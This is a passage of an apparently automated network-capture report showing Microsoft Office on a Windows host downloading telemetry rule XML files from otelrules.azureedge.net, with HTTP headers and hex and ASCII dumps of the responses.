                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-16849878b78qwx7pmw9x5fub1c000000036000000000crgr
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    104192.168.2.44985913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 501
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                    ETag: "0x8DC582BACFDAACD"
                                                                    x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130333Z-16849878b787wpl5wqkt5731b400000005q000000000mukz
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    105192.168.2.44986013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:33 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 2592
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                    ETag: "0x8DC582BB5B890DB"
                                                                    x-ms-request-id: a9172f65-e01e-0020-698c-27de90000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130334Z-17c5cb586f62blg5ss55p9d6fn00000005h0000000008d3c
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    106192.168.2.44986113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:34 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 3342
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                    ETag: "0x8DC582B927E47E9"
                                                                    x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130334Z-16849878b786jv8w2kpaf5zkqs00000003w000000000ew9z
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    107192.168.2.44986213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:34 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 2284
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                    ETag: "0x8DC582BCD58BEEE"
                                                                    x-ms-request-id: fb8efb24-701e-0050-0ba3-266767000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130334Z-16849878b78zqkvcwgr6h55x9n00000004kg0000000052kz
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    108192.168.2.44986313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:34 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1393
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                    ETag: "0x8DC582BE3E55B6E"
                                                                    x-ms-request-id: 98c82924-f01e-0020-04fc-26956b000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130334Z-r197bdfb6b4skzzvqpzzd3xetg00000004b0000000009t3m
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    109192.168.2.44986413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:34 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1356
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                    ETag: "0x8DC582BDC681E17"
                                                                    x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130334Z-16849878b7867ttgfbpnfxt44s00000004y000000000azfe
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    110192.168.2.44986513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:34 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:34 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1393
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                    ETag: "0x8DC582BE39DFC9B"
                                                                    x-ms-request-id: 0243abe0-001e-0028-29fb-25c49f000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130334Z-16849878b787bfsh7zgp804my400000003yg0000000010au
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:34 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    111192.168.2.44986613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:35 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:35 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:35 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1356
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                    ETag: "0x8DC582BDF66E42D"
                                                                    x-ms-request-id: 2e99a458-901e-0067-29ae-26b5cb000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130335Z-16849878b78g2m84h2v9sta29000000003w000000000h0yf
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:35 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    112192.168.2.44986813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:35 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:35 UTC563INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:35 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1358
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                    ETag: "0x8DC582BE6431446"
                                                                    x-ms-request-id: 44be6224-701e-0032-738d-27a540000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130335Z-17c5cb586f6wnfhvhw6gvetfh400000004bg00000000c74e
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:35 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    113192.168.2.44986713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:35 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:35 UTC584INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:35 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 1395
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                    ETag: "0x8DC582BE017CAD3"
                                                                    x-ms-request-id: 0151f49e-401e-0048-33f6-270409000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130335Z-r197bdfb6b46kmj4701qkq602400000004400000000057ym
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
